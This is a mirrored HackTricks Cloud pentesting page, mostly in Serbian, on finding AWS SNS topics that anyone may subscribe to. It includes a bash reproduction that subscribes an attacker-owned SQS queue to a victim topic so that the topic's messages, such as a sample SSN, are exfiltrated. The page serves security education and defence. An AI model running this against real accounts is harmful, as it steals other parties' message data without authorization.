gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-04 11:07:37 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
5e69588f1dd1c10093e2ae4a16c00bfc45ee8abd
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum/README.md

2.9 KiB
Raw Blame History

AWS - SNS Unauthenticated Enum

{{#include ../../../../banners/hacktricks-training.md}}

SNS

Za više informacija o SNS pogledajte:

{{#ref}} ../../aws-services/aws-sns-enum.md {{#endref}}

Otvoreno za sve

Kada konfigurišete SNS topic iz web konzole moguće je označiti da Everyone can publish and subscribe na topic:

Dakle, ako pronađete ARN of topics unutar naloga (ili brute forcing potencijalnih imena for topics) možete proveriti da li možete publish ili subscribe na njih.

To bi bilo ekvivalentno SNS topic resource policy koja dozvoljava sns:Subscribe za * (ili za external accounts), bilo koji principal može kreirati subscription koji isporučuje sve buduće poruke topic-a u SQS queue koji poseduje. Kada vlasnik queue-a inicira subscription, nije potrebna ljudska potvrda za SQS endpoints.

Repro (us-east-1) ```bash REGION=us-east-1 # Victim account (topic owner) VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)

Open the topic to anyone subscribing

cat > /tmp/topic-policy.json <<JSON {"Version":"2012-10-17","Statement":[{"Sid":"OpenSubscribe","Effect":"Allow","Principal":"*","Action":"sns:Subscribe","Resource":"$VICTIM_TOPIC_ARN"}]} JSON aws sns set-topic-attributes --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --attribute-name Policy --attribute-value file:///tmp/topic-policy.json

Attacker account (queue owner)

ATTACKER_Q_URL=$(aws sqs create-queue --queue-name attacker-exfil-queue-$(date +%s) --region $REGION --query QueueUrl --output text) ATTACKER_Q_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

Allow the victim topic to send to the attacker queue

cat > /tmp/sqs-policy.json <<JSON {"Version":"2012-10-17","Statement":[{"Sid":"AllowVictimTopicSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$ATTACKER_Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$VICTIM_TOPIC_ARN"}}}]} JSON aws sqs set-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attributes Policy="$(cat /tmp/sqs-policy.json)"

Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)

SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --protocol sqs --notification-endpoint "$ATTACKER_Q_ARN" --query SubscriptionArn --output text)

Validation: publish and receive

aws sns publish --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --message {pii:ssn:123-45-6789} aws sqs receive-message --queue-url "$ATTACKER_Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --query Messages[0].Body --output text

</details>

{{#include ../../../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink